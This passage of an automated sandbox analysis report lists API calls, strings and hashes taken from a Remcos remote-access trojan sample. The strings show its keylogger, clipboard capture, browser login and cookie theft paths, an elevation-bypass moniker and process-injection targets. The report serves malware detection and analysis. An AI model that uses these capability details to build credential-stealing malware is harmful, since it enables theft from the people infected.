                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: lJD$lJD$lJD
                                    • API String ID: 745075371-479184356
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00449212
                                    • _free.LIBCMT ref: 00449236
                                    • _free.LIBCMT ref: 004493BD
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP$['E
                                    • API String ID: 2299586839-2532616801
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • UserProfile, xrefs: 0040BA1E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                    • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    • Opcode ID: a6751bec5fce5d81251b9b736bf08cf26c1fafd63ddf946bc12b4f105cc54f1c
                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                    • Opcode Fuzzy Hash: a6751bec5fce5d81251b9b736bf08cf26c1fafd63ddf946bc12b4f105cc54f1c
                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                    • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID: sJD
                                    • API String ID: 4212172061-3536923933
                                    • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                    • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: 0486a3e5323fa754227002c4bfd4b9cac3373fa35fae64e05d413ef310d72826
                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                    • Opcode Fuzzy Hash: 0486a3e5323fa754227002c4bfd4b9cac3373fa35fae64e05d413ef310d72826
                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
